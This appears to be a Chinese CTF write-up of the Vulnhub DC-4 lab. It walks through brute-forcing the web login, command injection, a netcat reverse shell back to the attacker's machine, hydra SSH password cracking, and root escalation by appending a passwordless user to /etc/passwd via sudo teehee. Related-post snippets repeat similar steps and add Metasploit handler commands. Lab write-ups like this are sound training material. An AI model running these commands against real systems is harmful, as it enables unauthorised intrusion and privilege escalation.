Vulnhub靶机——DC-4

于 2025-02-20 21:37:08 发布
阅读量1.1k 收藏 14
点赞数 25
分类专栏: 靶场练习 # Vulnhub 文章标签: 安全 网络 web安全

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

1.3 工具准备

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 目录扫描

三、漏洞利用

3.1 暴力破解

3.2 命令执行

四、权限提升

4.1 nc反弹shell

4.2 收集信息

4.3 teehee提权

一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: DC: 4 ~ VulnHub

(2)通过上述简介可以知道,此靶机只有一面旗帜,但有多个入口点。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

1.3 工具准备
  • BurpSuite
  • 用户名和密码的渗透字典
  • hydra

二、站点信息收集

2.1 IP扫描

使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.150

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口

(2)访问80端口,是一个登录界面

2.3 目录扫描

使用dirsearch工具对网站目录进行扫描,没有什么其他的发现,都需要先进行登录

三、漏洞利用

3.1 暴力破解

(1)在登录页面输入随机的用户名和密码,打开burpsuite进行抓包

(2)将抓到的数据包发送到Intruder

(3)设置爆破类型为Cluster bomb,添加爆破点username和password

(4)为用户名和密码上传常见的字典并开始爆破

(5)成功得到用户名和密码admin|happy

3.2 命令执行

(1)使用爆破出来的数据进行登录,登录页面如下,点击Command

(2)选择List Files,点击run,回显命令ls -l和命令执行的结果

(3)使用burpsuite进行抓包,在ls+-l处尝试命令注入

(4)将数据包发送到Repeater

(5)在数据包的ls -l处写入命令whoami,点击send,发现网页执行了该命令,存在命令执行漏洞

四、权限提升

4.1 nc反弹shell

(1)在kali中开启监听

(2)在数据包中写入nc反弹shell命令,点击send,命令执行成功

nc -e /bin/bash 192.168.101.130 5555 //空格用+替换

(3)kali监听成功

4.2 收集信息

(1)使用脚本获得一个交互式的webshell

python -c 'import pty;pty.spawn("/bin/bash")'

(2)在/home/jim目录下发现一个old-passwords.bak文件,可能是jim用户之前使用过的旧密码,查看该文件

(3)另外两个用户charles和sam目录下没有什么东西

(4)将刚刚old-passwords.bak文件中的密码保存到一个passwd.txt文件中

(5)使用hydra工具进行爆破,爆破成功

hydra -l jim -P /home/kali/Desktop/渗透字典/passwd.txt -t 10 ssh://192.168.101.150

(6)使用爆破出来的密码进行登录,这里提示我们有一封邮件

(7)去邮件目录下查看内容,发现charles用户的密码^xHhA&hvim0y

(8)切换到charles用户,登录成功

4.3 teehee提权

(1)由于charles目录下没有什么有用的东西,查看可以执行的root权限的命令

teehee 是一个非常小型的文本编辑器,通常用于 Linux 系统中的命令行环境。它的功能和操作方式类似于其他命令行文本编辑器,不具备像 vim 或 nano 那样丰富的功能和扩展性。它的目的是为用户提供一个快速、直观的编辑工具,适合需要快速修改文本文件的场景。

(2)利用管道符配合teehee命令,在passwd文件里写入一个不用密码的root权限的用户awuawu,并切换用户

echo 'awuawu::0:0:::/bin/bash' | sudo teehee -a /etc/passwd //-a表示将内容追加到文件末尾

(3)提权成功,查看flag

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

vulnhub---DC-4靶机
qq_43168364的博客
08-21 2135
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
VulnHubDC-4
weixin_39219503的博客
01-31 325
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
vulnhub靶机DC-4
m0_52328368的博客
08-19 1237
vulnhubdc-4详细步骤
Vulnhub DC-4
柠檬木有枝
07-14 296
Nmap 扫描主机,nmap -sS 192.168.6.0/24 访问服务是一个登陆页面,使用 burp 爆破用户名为 admin,密码为 happy /home/jim/backups 下发现 old-passwords.bak 读取一下 使用 hydra 爆破 ssh:hydra -l jim -P password.txt 192.168.6.130 ssh 用户名:jim,密码:...
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1802
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2688
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3306
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9264
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 5011
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub-DC-4
KAKA的博客
07-04 344
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
vulnhub-dc4
bqnagus
10-05 1250
vulnhub-dc4靶机复现
VulnHub DC: 4
spider的博客
12-01 294
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 516
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
[Vulnhub] DC-4
weixin_63231007的博客
01-28 951
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
[VulnHub]DC-4
cosmoslin的博客
09-07 191
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 543
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
vulnhub靶场,DC-4
kukudeshuo的博客
07-12 383
vulnhub靶场,DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
靶机 DC-4
m0_66299232的博客
09-19 404
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写。4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下4.发现了另外一个账户,并且文中有该账户的密码。既然我们获得了旧密码,也获得了账户。命令执行
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值